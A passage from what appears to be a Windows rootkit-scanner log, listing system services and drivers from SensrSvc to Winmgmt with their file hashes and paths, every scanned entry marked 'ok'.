16:02:06.0282 0x4af4 [ 0336CFFAFAAB87A11541F1CF1594B2B2, 8B8A6A33E78A12FB05E29B2E2775850626574AFD2EF88748D65E690A07B10B8D ] SensrSvc C:\Windows\system32\sensrsvc.dll
16:02:06.0298 0x4af4 SensrSvc - ok
16:02:06.0314 0x4af4 [ CB624C0035412AF0DEBEC78C41F5CA1B, A4D937F11E06CAE914347CA1362F4C98EC5EE0C0C80321E360EA1ABD6726F8D4 ] Serenum C:\Windows\system32\drivers\serenum.sys
16:02:06.0314 0x4af4 Serenum - ok
16:02:06.0329 0x4af4 [ C1D8E28B2C2ADFAEC4BA89E9FDA69BD6, 8F9776FB84C5D11068EAF1FF1D1A46466C655D64D256A8B1E31DC0C23B5DD22D ] Serial C:\Windows\system32\drivers\serial.sys
16:02:06.0345 0x4af4 Serial - ok
16:02:06.0360 0x4af4 [ 1C545A7D0691CC4A027396535691C3E3, 065C30BE598FF4DC55C37E0BBE0CEDF10A370AE2BF5404B42EBBB867A3FFED6D ] sermouse C:\Windows\system32\drivers\sermouse.sys
16:02:06.0360 0x4af4 sermouse - ok
16:02:06.0376 0x4af4 [ 0B6231BF38174A1628C4AC812CC75804, E569BF1F7F5689E2E917FA6516DB53388A5B8B1C6699DEE030147E853218811D ] SessionEnv C:\Windows\system32\sessenv.dll
16:02:06.0407 0x4af4 SessionEnv - ok
16:02:06.0407 0x4af4 [ A554811BCD09279536440C964AE35BBF, DA8F893722F803E189D7D4D6C6232ED34505B63A64ED3A0132A5BB7A2BABDE55 ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
16:02:06.0423 0x4af4 sffdisk - ok
16:02:06.0438 0x4af4 [ FF414F0BAEFEBA59BC6C04B3DB0B87BF, B81EF5D26AEB572CAB590F7AD7CA8C89F296420089EF5E6148E972F2DBCA1042 ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
16:02:06.0438 0x4af4 sffp_mmc - ok
16:02:06.0454 0x4af4 [ DD85B78243A19B59F0637DCF284DA63C, 6730D4F2BAE7E24615746ACC41B42D01DB6068D6504982008ADA1890DE900197 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
16:02:06.0470 0x4af4 sffp_sd - ok
16:02:06.0470 0x4af4 [ A9D601643A1647211A1EE2EC4E433FF4, 7AC60B4AB48D4BBF1F9681C12EC2A75C72E6E12D30FABC564A24394310E9A5F9 ] sfloppy C:\Windows\system32\drivers\sfloppy.sys
16:02:06.0485 0x4af4 sfloppy - ok
16:02:06.0516 0x4af4 [ B95F6501A2F8B2E78C697FEC401970CE, 758B73A32902299A313348CE7EC189B20EB4CB398D0180E4EE24B84DAD55F291 ] SharedAccess C:\Windows\System32\ipnathlp.dll
16:02:06.0548 0x4af4 SharedAccess - ok
16:02:06.0579 0x4af4 [ AAF932B4011D14052955D4B212A4DA8D, 2A3BFD0FA9569288E91AE3E72CA1EC39E1450D01E6473CE51157E0F138257923 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
16:02:06.0610 0x4af4 ShellHWDetection - ok
16:02:06.0626 0x4af4 [ 843CAF1E5FDE1FFD5FF768F23A51E2E1, 89CA9F516E42A6B905474D738CDA2C121020A07DBD4E66CFE569DD77D79D7820 ] SiSRaid2 C:\Windows\system32\drivers\SiSRaid2.sys
16:02:06.0626 0x4af4 SiSRaid2 - ok
16:02:06.0641 0x4af4 [ 6A6C106D42E9FFFF8B9FCB4F754F6DA4, 87B85C66DF7EB6FDB8A2341D05FAA5261FF68A90CCFC63F0E4A03824F1E33E5E ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
16:02:06.0657 0x4af4 SiSRaid4 - ok
16:02:06.0657 0x4af4 [ 548260A7B8654E024DC30BF8A7C5BAA4, 4A7E58331D7765A12F53DC2371739DC9A463940B13E16157CE10DB80E958D740 ] Smb C:\Windows\system32\DRIVERS\smb.sys
16:02:06.0672 0x4af4 Smb - ok
16:02:06.0688 0x4af4 [ 6313F223E817CC09AA41811DAA7F541D, D787061043BEEDB9386B048CB9E680E6A88A1CBAE9BD4A8C0209155BFB76C630 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
16:02:06.0704 0x4af4 SNMPTRAP - ok
16:02:06.0719 0x4af4 [ B9E31E5CACDFE584F34F730A677803F9, 21A5130BD00089C609522A372018A719F8E37103D2DD22C59EACB393BE35A063 ] spldr C:\Windows\system32\drivers\spldr.sys
16:02:06.0719 0x4af4 spldr - ok
16:02:06.0750 0x4af4 [ 85DAA09A98C9286D4EA2BA8D0E644377, F9C324E2EF81193FE831C7EECC44A100CA06F82FA731BF555D9EA4D91DA13329 ] Spooler C:\Windows\System32\spoolsv.exe
16:02:06.0766 0x4af4 Spooler - ok
16:02:06.0875 0x4af4 [ E17E0188BB90FAE42D83E98707EFA59C, FC075F7B39E86CC8EF6DA4E339FE946917E319C347AC70FB0C50AAF36F97E27F ] sppsvc C:\Windows\system32\sppsvc.exe
16:02:06.0953 0x4af4 sppsvc - ok
16:02:07.0000 0x4af4 [ 93D7D61317F3D4BC4F4E9F8A96A7DE45, 36D48B23B8243BE5229707375FCD11C2DCAC96983199345365F065A0CBF33314 ] sppuinotify C:\Windows\system32\sppuinotify.dll
16:02:07.0016 0x4af4 sppuinotify - ok
16:02:07.0031 0x4af4 [ 441FBA48BFF01FDB9D5969EBC1838F0B, 306128F1AD489F87161A089D1BDC1542A4CB742D91A0C12A7CD1863FDB8932C0 ] srv C:\Windows\system32\DRIVERS\srv.sys
16:02:07.0047 0x4af4 srv - ok
16:02:07.0078 0x4af4 [ B4ADEBBF5E3677CCE9651E0F01F7CC28, 726DB2283113AB2A9681E8E9F61132303D6D86E9CD034C40EE4A8C9DB29E87F7 ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
16:02:07.0094 0x4af4 srv2 - ok
16:02:07.0094 0x4af4 [ 27E461F0BE5BFF5FC737328F749538C3, AFA4704ED8FFC1A0BAB40DFB81D3AE3F3D933A3C9BF54DDAF39FF9AF3646D9E6 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
16:02:07.0109 0x4af4 srvnet - ok
16:02:07.0140 0x4af4 [ 51B52FBD583CDE8AA9BA62B8B4298F33, 2E2403F8AA39E79D1281CA006B51B43139C32A5FDD64BD34DAA4B935338BD740 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
16:02:07.0172 0x4af4 SSDPSRV - ok
16:02:07.0187 0x4af4 [ 0211AB46B73A2623B86C1CFCB30579AB, 7CC9BA2DF7B9EA6BB17EE342898EDD7F54703B93B6DED6A819E83A7EE9F938B4 ] SSPORT C:\Windows\system32\Drivers\SSPORT.sys
16:02:07.0187 0x4af4 SSPORT - ok
16:02:07.0203 0x4af4 [ AB7AEBF58DAD8DAAB7A6C45E6A8885CB, D21CDBC4C2AA0DB5B4455D5108B0CAF4282A2E664B9035708F212CC094569D9D ] SstpSvc C:\Windows\system32\sstpsvc.dll
16:02:07.0218 0x4af4 SstpSvc - ok
16:02:07.0234 0x4af4 [ F3817967ED533D08327DC73BC4D5542A, 1B204454408A690C0A86447F3E4AA9E7C58A9CFB567C94C17C21920BA648B4D5 ] stexstor C:\Windows\system32\drivers\stexstor.sys
16:02:07.0234 0x4af4 stexstor - ok
16:02:07.0281 0x4af4 [ 8DD52E8E6128F4B2DA92CE27402871C1, 1101C38BE8FC383B5F2F9FA402F9652B23B88A764DE2B584DFE62B88B11DEF92 ] stisvc C:\Windows\System32\wiaservc.dll
16:02:07.0296 0x4af4 stisvc - ok
16:02:07.0328 0x4af4 [ D01EC09B6711A5F8E7E6564A4D0FBC90, 3CB922291DBADC92B46B9E28CCB6810CD8CCDA3E74518EC9522B58B998E1F969 ] swenum C:\Windows\system32\drivers\swenum.sys
16:02:07.0328 0x4af4 swenum - ok
16:02:07.0359 0x4af4 [ E08E46FDD841B7184194011CA1955A0B, 9C3725BB1F08F92744C980A22ED5C874007D3B5863C7E1F140F50061052AC418 ] swprv C:\Windows\System32\swprv.dll
16:02:07.0390 0x4af4 swprv - ok
16:02:07.0452 0x4af4 [ 7BE4CDEA6BC7832BFE3112A350D8B9EA, B51BD5A02D20C1CD8F7B4326114C2FA57ABD8D75133D6CE906CB65E97AAB7F70 ] SysMain C:\Windows\system32\sysmain.dll
16:02:07.0484 0x4af4 SysMain - ok
16:02:07.0499 0x4af4 [ E3C61FD7B7C2557E1F1B0B4CEC713585, 01F0E116606D185BF93B540868075BFB1A398197F6AABD994983DBFF56B3A8A0 ] TabletInputService C:\Windows\System32\TabSvc.dll
16:02:07.0515 0x4af4 TabletInputService - ok
16:02:07.0530 0x4af4 [ 40F0849F65D13EE87B9A9AE3C1DD6823, E251A7EF3D0FD2973AF33A62FC457A7E8D5E8694208F811F52455F7C2426121F ] TapiSrv C:\Windows\System32\tapisrv.dll
16:02:07.0562 0x4af4 TapiSrv - ok
16:02:07.0577 0x4af4 [ 1BE03AC720F4D302EA01D40F588162F6, AB644862BF1D2E824FD846180DEC4E2C0FAFCC517451486DE5A92E5E78A952E4 ] TBS C:\Windows\System32\tbssvc.dll
16:02:07.0593 0x4af4 TBS - ok
16:02:07.0671 0x4af4 [ 04ADD18EE5CC9FBEDAEC1DD1CD0CB45E, F05C0C4CA3DD234AD5D60CF1EF763C9A1D9EC3C157E180C2D75CC07E6B02A611 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
16:02:07.0718 0x4af4 Tcpip - ok
16:02:07.0749 0x4af4 [ 04ADD18EE5CC9FBEDAEC1DD1CD0CB45E, F05C0C4CA3DD234AD5D60CF1EF763C9A1D9EC3C157E180C2D75CC07E6B02A611 ] TCPIP6 C:\Windows\system32\DRIVERS\tcpip.sys
16:02:07.0780 0x4af4 TCPIP6 - ok
16:02:07.0811 0x4af4 [ 1B16D0BD9841794A6E0CDE0CEF744ABC, 7EB8BA97339199EEE7F2B09DA2DA6279DA64A510D4598D42CF86415D67CD674C ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
16:02:07.0827 0x4af4 tcpipreg - ok
16:02:07.0842 0x4af4 [ 3371D21011695B16333A3934340C4E7C, 7416F9BBFC1BA9D875EA7D1C7A0D912FC6977B49A865D67E3F9C4E18A965082D ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
16:02:07.0858 0x4af4 TDPIPE - ok
16:02:07.0874 0x4af4 [ 51C5ECEB1CDEE2468A1748BE550CFBC8, 4E8F83877330B421F7B5D8393D34BC44C6450E69209DAA95B29CB298166A5DF9 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
16:02:07.0874 0x4af4 TDTCP - ok
16:02:07.0905 0x4af4 [ DDAD5A7AB24D8B65F8D724F5C20FD806, B71F2967A4EE7395E4416C1526CB85368AEA988BDD1F2C9719C48B08FAFA9661 ] tdx C:\Windows\system32\DRIVERS\tdx.sys
16:02:07.0920 0x4af4 tdx - ok
16:02:07.0936 0x4af4 [ 561E7E1F06895D78DE991E01DD0FB6E5, 83BFA50A528762EC52A011302AC3874636FB7E26628CD7ACFBF2BDC9FAA8110D ] TermDD C:\Windows\system32\drivers\termdd.sys
16:02:07.0936 0x4af4 TermDD - ok
16:02:07.0983 0x4af4 [ 4FC4C50985E5B840F4D72E57286887B8, 0BCBB4A938803AE3A3532B6D8FFC85594AA9AEF5D8F9792684841BEA8780AE9E ] TermService C:\Windows\System32\termsrv.dll
16:02:07.0998 0x4af4 TermService - ok
16:02:08.0014 0x4af4 [ F0344071948D1A1FA732231785A0664C, DB9886C2C858FAF45AEA15F8E42860343F73EB8685C53EC2E8CCC10586CB0832 ] Themes C:\Windows\system32\themeservice.dll
16:02:08.0014 0x4af4 Themes - ok
16:02:08.0045 0x4af4 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] THREADORDER C:\Windows\system32\mmcss.dll
16:02:08.0061 0x4af4 THREADORDER - ok
16:02:08.0076 0x4af4 [ DBCC20C02E8A3E43B03C304A4E40A84F, BF5F3ACCB0342304A6870E94D2576644B08DBF307C853C7DBA4B82B0C7309DA4 ] TPM C:\Windows\system32\drivers\tpm.sys
16:02:08.0076 0x4af4 TPM - ok
16:02:08.0092 0x4af4 [ 7E7AFD841694F6AC397E99D75CEAD49D, DE87F203FD8E6BDCCFCA1860A85F283301A365846FB703D9BB86278D8AC96B07 ] TrkWks C:\Windows\System32\trkwks.dll
16:02:08.0123 0x4af4 TrkWks - ok
16:02:08.0139 0x4af4 [ A1965DFC0CD91E7CFC42925F8F597274, 7478D7DACD94F0C3D4F0CDAC9CD71CB03CB45C503DE6B1207A51F989844CB1F3 ] TrueSight C:\Windows\System32\drivers\TrueSight.sys
16:02:08.0154 0x4af4 TrueSight - ok
16:02:08.0201 0x4af4 [ 773212B2AAA24C1E31F10246B15B276C, F2EF85F5ABA307976D9C649D710B408952089458DDE97D4DEF321DF14E46A046 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
16:02:08.0248 0x4af4 TrustedInstaller - ok
16:02:08.0279 0x4af4 [ E232A3B43A894BB327FC161529BD9ED1, F2673DA8C920F21ACCECC25F7C59A05822E5E577D47F126EDF9C94FEB4B30C5F ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
16:02:08.0279 0x4af4 tssecsrv - ok
16:02:08.0310 0x4af4 [ D11C783E3EF9A3C52C0EBE83CC5000E9, A136C355D4C8945729163D15801364A614E23217B15F9313C85BA45BB71A74EB ] TsUsbFlt C:\Windows\system32\drivers\tsusbflt.sys
16:02:08.0310 0x4af4 TsUsbFlt - ok
16:02:08.0326 0x4af4 [ 9CC2CCAE8A84820EAECB886D477CBCB8, 50D8AA2D7477A6618A0C31BB4D1C4887B457865FB1105E2E7B984EEFA337B804 ] TsUsbGD C:\Windows\system32\drivers\TsUsbGD.sys
16:02:08.0342 0x4af4 TsUsbGD - ok
16:02:08.0357 0x4af4 [ 3566A8DAAFA27AF944F5D705EAA64894, AE9D8B648DA08AF667B9456C3FE315489859C157510A258559F18238F2CC92B8 ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
16:02:08.0373 0x4af4 tunnel - ok
16:02:08.0388 0x4af4 [ B4DD609BD7E282BFC683CEC7EAAAAD67, EF131DB6F6411CAD36A989A421AF93F89DD61601AC524D2FF11C10FF6E3E9123 ] uagp35 C:\Windows\system32\drivers\uagp35.sys
16:02:08.0388 0x4af4 uagp35 - ok
16:02:08.0420 0x4af4 [ FF4232A1A64012BAA1FD97C7B67DF593, D8591B4EB056899C7B604E4DD852D82D4D9809F508ABCED4A03E1BE6D5D456E3 ] udfs C:\Windows\system32\DRIVERS\udfs.sys
16:02:08.0435 0x4af4 udfs - ok
16:02:08.0466 0x4af4 [ 3CBDEC8D06B9968ABA702EBA076364A1, B8DAB8AA804FC23021BFEBD7AE4D40FBE648D6C6BA21CC008E26D1C084972F9B ] UI0Detect C:\Windows\system32\UI0Detect.exe
16:02:08.0466 0x4af4 UI0Detect - ok
16:02:08.0482 0x4af4 [ 4BFE1BC28391222894CBF1E7D0E42320, 5918B1ED2030600DF77BDACF1C808DF6EADDD8BF3E7003AF1D72050D8B102B3A ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys
16:02:08.0498 0x4af4 uliagpkx - ok
16:02:08.0513 0x4af4 [ DC54A574663A895C8763AF0FA1FF7561, 09A3F3597E91CBEB2F38E96E75134312B60CAE5574B2AD4606C2D3E992AEDDFE ] umbus C:\Windows\system32\drivers\umbus.sys
16:02:08.0513 0x4af4 umbus - ok
16:02:08.0529 0x4af4 [ B2E8E8CB557B156DA5493BBDDCC1474D, F547509A08C0679ACB843E20C9C0CF51BED1B06530BBC529DFB0944504564A43 ] UmPass C:\Windows\system32\drivers\umpass.sys
16:02:08.0529 0x4af4 UmPass - ok
16:02:08.0622 0x4af4 [ 507E96F4BF60BBFBC7FFDC6E2F4A01C9, AA6C0D5245A5F4BAD0D9099DCAD5DF37170FC783966DD9440259F4429147AA75 ] UNS C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
16:02:08.0638 0x4af4 UNS - ok
16:02:08.0654 0x4af4 [ D47EC6A8E81633DD18D2436B19BAF6DE, 0FB461E2D5E0B75BB5958F6362F4880BFA4C36AD930542609BCAF574941AA7AE ] upnphost C:\Windows\System32\upnphost.dll
16:02:08.0685 0x4af4 upnphost - ok
16:02:08.0716 0x4af4 [ C9E9D59C0099A9FF51697E9306A44240, 78D9A7A5E5742962B6978F475BF06CB32262F1D214699D3D40538476A58012A1 ] USBAAPL64 C:\Windows\system32\Drivers\usbaapl64.sys
16:02:08.0732 0x4af4 USBAAPL64 - ok
16:02:08.0763 0x4af4 [ 91D3C92A44FC682DD791147604E79152, AA0B6799BF9C26C2C1793C91295288A4989AA43EC5E070B650DA7F0A142817CE ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys
16:02:08.0778 0x4af4 usbccgp - ok
16:02:08.0794 0x4af4 [ 80B0F7D5CCF86CEB5D402EAAF61FEC31, 140C62116A425DEAD25FE8D82DE283BC92C482A9F643658D512F9F67061F28AD ] usbcir C:\Windows\system32\drivers\usbcir.sys
16:02:08.0810 0x4af4 usbcir - ok
16:02:08.0841 0x4af4 [ F7FFDF2A1D19A76A87759126B244C816, C91F09D77E22D976952A46F7B93F611B719EDAF694D538242FA8FAF1BA9BB2F0 ] usbehci C:\Windows\system32\drivers\usbehci.sys
16:02:08.0841 0x4af4 usbehci - ok
16:02:08.0872 0x4af4 [ 245FE7FC634D6A993E682E0A9EBA4ABB, F7A536D215EE3A63358EC8B5946D7BB3B56357BF91347B07013E00DAC98775B6 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys
16:02:08.0888 0x4af4 usbhub - ok
16:02:08.0919 0x4af4 [ C1A8966E0D09BFB501045105B30D86F2, 5BB95FBA441B898E258A3BFE174FC1042A04C19E25C59DE1FD90594290B11DA9 ] usbohci C:\Windows\system32\drivers\usbohci.sys
16:02:08.0919 0x4af4 usbohci - ok
16:02:08.0934 0x4af4 [ 73188F58FB384E75C4063D29413CEE3D, B485463933306036B1D490722CB1674DC85670753D79FA0EF7EBCA7BBAAD9F7C ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys
16:02:08.0950 0x4af4 usbprint - ok
16:02:08.0981 0x4af4 [ 73B84C8CE467E81A94D4194F8009F2A0, 65CB7C61F4675C2D8EB5C5454577E7AD36F9D390F08E59EAF1765761B97424FB ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
16:02:08.0981 0x4af4 USBSTOR - ok
16:02:09.0012 0x4af4 [ 2E682DCE4319A90E02A327F8A427544A, 3528C5A4669BAD53041085C3E72C64388D308E42AD9D1FAC85B6F2FFD81610FB ] usbuhci C:\Windows\system32\drivers\usbuhci.sys
16:02:09.0028 0x4af4 usbuhci - ok
16:02:09.0044 0x4af4 [ 1F775DA4CF1A3A1834207E975A72E9D7, 6D3DE5BD3EF3A76E997E5BAF900C51D25308F5A9682D1F62017F577A24095B90 ] usbvideo C:\Windows\System32\Drivers\usbvideo.sys
16:02:09.0044 0x4af4 usbvideo - ok
16:02:09.0075 0x4af4 [ EDBB23CBCF2CDF727D64FF9B51A6070E, 7202484C8E1BFB2AFD64D8C81668F3EDE0E3BF5EB27572877A0A7B337AE5AE42 ] UxSms C:\Windows\System32\uxsms.dll
16:02:09.0106 0x4af4 UxSms - ok
16:02:09.0106 0x4af4 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] VaultSvc C:\Windows\system32\lsass.exe
16:02:09.0122 0x4af4 VaultSvc - ok
16:02:09.0122 0x4af4 [ C5C876CCFC083FF3B128F933823E87BD, 6FE0FBB6C3207E09300E0789E2168F76668D87C317FE9F263E733827ADCFBE0D ] vdrvroot C:\Windows\system32\drivers\vdrvroot.sys
16:02:09.0137 0x4af4 vdrvroot - ok
16:02:09.0153 0x4af4 [ 8D6B481601D01A456E75C3210F1830BE, A2CEF483F4231367138EEF7E67FD5BE5364FC0780C44CA1368E36CE4AA3D0633 ] vds C:\Windows\System32\vds.exe
16:02:09.0184 0x4af4 vds - ok
16:02:09.0200 0x4af4 [ DA4DA3F5E02943C2DC8C6ED875DE68DD, EDE604536DB78C512D68C92B26DA77C8811AC109D1F0A473673F0A82D15A2838 ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
16:02:09.0215 0x4af4 vga - ok
16:02:09.0231 0x4af4 [ 53E92A310193CB3C03BEA963DE7D9CFC, 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125 ] VgaSave C:\Windows\System32\drivers\vga.sys
16:02:09.0262 0x4af4 VgaSave - ok
16:02:09.0293 0x4af4 [ 2CE2DF28C83AEAF30084E1B1EB253CBB, D1946816A1CB89F825CBEA58F94A4C9D0CE7249355CD3915563F54054EE564BF ] vhdmp C:\Windows\system32\drivers\vhdmp.sys
16:02:09.0309 0x4af4 vhdmp - ok
16:02:09.0340 0x4af4 [ E5689D93FFE4E5D66C0178761240DD54, 6D35CED80681B12AAF63BFA0DA1C386E71D3838839B68A686990AA8031949D27 ] viaide C:\Windows\system32\drivers\viaide.sys
16:02:09.0356 0x4af4 viaide - ok
16:02:09.0371 0x4af4 [ E29564BECE3087DB4685A467957D5C2F, FA81ECF1B85DC8DE6BE2357E386975C5BC138BA4C847AB3204D6B0D616CB99E0 ] ViWDM C:\Windows\system32\DRIVERS\ViWDM.SYS
16:02:09.0371 0x4af4 ViWDM - ok
16:02:09.0387 0x4af4 [ F6151F63A8E9C92A9AE8181DDDFF3A9A, DBDBA36DFC2A366F3B1DBC07035D5EB18E7B7B7E6CABA907F53462E70BBDB0E8 ] volmgr C:\Windows\system32\drivers\volmgr.sys
16:02:09.0387 0x4af4 volmgr - ok
16:02:09.0418 0x4af4 [ A255814907C89BE58B79EF2F189B843B, 463DB771851352185B6AC323BD93B9084D47291E53C1F7B628B65D6918B2E28F ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
16:02:09.0434 0x4af4 volmgrx - ok
16:02:09.0465 0x4af4 [ DF8126BD41180351A093A3AD2FC8903B, AEFF4AA89CDDAAAD43CDE17C6B6EB2A397A0AC1651CBD51B889161EC2BC6527A ] volsnap C:\Windows\system32\drivers\volsnap.sys
16:02:09.0465 0x4af4 volsnap - ok
16:02:09.0496 0x4af4 [ DDF7522FBEF8D50E015E743813595801, F4839D7BC540219463A52E85370B6CD77CFDD8E3068869BAF52DB9F7FAC0C2EB ] vrvd5 C:\Windows\system32\DRIVERS\vrvd5.sys
16:02:09.0512 0x4af4 vrvd5 - ok
16:02:09.0527 0x4af4 [ 5E2016EA6EBACA03C04FEAC5F330D997, 53106EB877459FE55A459111F7AB0EE320BB3B4C954D3DB6FA1642396001F2AC ] vsmraid C:\Windows\system32\drivers\vsmraid.sys
16:02:09.0543 0x4af4 vsmraid - ok
16:02:09.0621 0x4af4 [ B60BA0BC31B0CB414593E169F6F21CC2, 47B801E623254CF0202B3591CB5C019CABFB52F123C7D47E29D19B32F1F2B915 ] VSS C:\Windows\system32\vssvc.exe
16:02:09.0668 0x4af4 VSS - ok
16:02:09.0683 0x4af4 [ 36D4720B72B5C5D9CB2B9C29E9DF67A1, 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7 ] vwifibus C:\Windows\system32\DRIVERS\vwifibus.sys
16:02:09.0699 0x4af4 vwifibus - ok
16:02:09.0714 0x4af4 [ 13A0DECD1794DE60A8427862C8669D27, 4024AF9F2F052BC80C85F5B9A671499C20AF38838206CC649E6EFE37C380D3BF ] vwififlt C:\Windows\system32\DRIVERS\vwififlt.sys
16:02:09.0730 0x4af4 vwififlt - ok
16:02:09.0746 0x4af4 [ 1C9D80CC3849B3788048078C26486E1A, 34A89F31E53F6B6C209B286F580CC2257AE6D057E4E20741F241C9C167947962 ] W32Time C:\Windows\system32\w32time.dll
16:02:09.0777 0x4af4 W32Time - ok
16:02:09.0792 0x4af4 [ 4E9440F4F152A7B944CB1663D3935A3E, 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
16:02:09.0808 0x4af4 WacomPen - ok
16:02:09.0824 0x4af4 [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] WANARP C:\Windows\system32\DRIVERS\wanarp.sys
16:02:09.0839 0x4af4 WANARP - ok
16:02:09.0839 0x4af4 [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
16:02:09.0870 0x4af4 Wanarpv6 - ok
16:02:09.0917 0x4af4 [ 3CEC96DE223E49EAAE3651FCF8FAEA6C, 4150DAB33E8D61076F1D4767BCAFC9B4ECCCCBD58FD4FB3CFE5B8D27DCDCAB61 ] WatAdminSvc C:\Windows\system32\Wat\WatAdminSvc.exe
16:02:09.0933 0x4af4 WatAdminSvc - ok
16:02:10.0011 0x4af4 [ 78F4E7F5C56CB9716238EB57DA4B6A75, 46A4E78CE5F2A4B26F4E9C3FF04A99D9B727A82AC2E390A82A1611C3F6E0C9AF ] wbengine C:\Windows\system32\wbengine.exe
16:02:10.0042 0x4af4 wbengine - ok
16:02:10.0058 0x4af4 [ 3AA101E8EDAB2DB4131333F4325C76A3, 4F7BD3DA5E58B18BFF106CFF7B45E75FD13EE556D433C695BA23EC80827E49DE ] WbioSrvc C:\Windows\System32\wbiosrvc.dll
16:02:10.0073 0x4af4 WbioSrvc - ok
16:02:10.0089 0x4af4 [ 7368A2AFD46E5A4481D1DE9D14848EDD, 8039C478FC2D9F095F5883A4FA47F9E6EDF57CC88A4AA74F07C88445F90DED57 ] wcncsvc C:\Windows\System32\wcncsvc.dll
16:02:10.0104 0x4af4 wcncsvc - ok
16:02:10.0120 0x4af4 [ 20F7441334B18CEE52027661DF4A6129, 7B8E0247234B740FED2BE9B833E9CE8DD7453340123AB43F6B495A7E6A27B0DD ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
16:02:10.0120 0x4af4 WcsPlugInService - ok
16:02:10.0151 0x4af4 [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd C:\Windows\system32\drivers\wd.sys
16:02:10.0167 0x4af4 Wd - ok
16:02:10.0182 0x4af4 [ A3D04EBF5227886029B4532F20D026F7, D90F7B9C176008675DA0B5FD7E4973CBC2A04172CEDF8FB7D3B3B4F27B5440D7 ] WDC_SAM C:\Windows\system32\DRIVERS\wdcsam64.sys
16:02:10.0198 0x4af4 WDC_SAM - ok
16:02:10.0260 0x4af4 [ E2C933EDBC389386EBE6D2BA953F43D8, AF1DEADD5F1267CCEBD226E8EEB971D1946EA6A5A9645A36F5D111F758AF2F07 ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
16:02:10.0292 0x4af4 Wdf01000 - ok
16:02:10.0292 0x4af4 [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiServiceHost C:\Windows\system32\wdi.dll
16:02:10.0307 0x4af4 WdiServiceHost - ok
16:02:10.0307 0x4af4 [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiSystemHost C:\Windows\system32\wdi.dll
16:02:10.0323 0x4af4 WdiSystemHost - ok
16:02:10.0354 0x4af4 [ 0EB0E5D22B1760F2DBCE632F2DD7A54D, B8A4CC62F88768947FB0A161CF9564DB28FD9C1C037B5475DF192982DE035C22 ] WebClient C:\Windows\System32\webclnt.dll
16:02:10.0370 0x4af4 WebClient - ok
16:02:10.0385 0x4af4 [ C749025A679C5103E575E3B48E092C43, B71171D07EE7AB085A24BF3A1072FF2CE7EA021AAE695F6A90640E6EE8EB55C1 ] Wecsvc C:\Windows\system32\wecsvc.dll
16:02:10.0416 0x4af4 Wecsvc - ok
16:02:10.0432 0x4af4 [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport C:\Windows\System32\wercplsupport.dll
16:02:10.0448 0x4af4 wercplsupport - ok
16:02:10.0463 0x4af4 [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc C:\Windows\System32\WerSvc.dll
16:02:10.0494 0x4af4 WerSvc - ok
16:02:10.0494 0x4af4 [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf C:\Windows\system32\DRIVERS\wfplwf.sys
16:02:10.0526 0x4af4 WfpLwf - ok
16:02:10.0541 0x4af4 [ 05ECAEC3E4529A7153B3136CEB49F0EC, 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50 ] WIMMount C:\Windows\system32\drivers\wimmount.sys
16:02:10.0541 0x4af4 WIMMount - ok
16:02:10.0557 0x4af4 WinDefend - ok
16:02:10.0557 0x4af4 WinHttpAutoProxySvc - ok
16:02:10.0619 0x4af4 [ 19B07E7E8915D701225DA41CB3877306, D6555E8D276DBB11358246E0FE215F76F1FB358791C76B88D82C2A66A42DA19F ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
16:02:10.0666 0x4af4 Winmgmt - ok
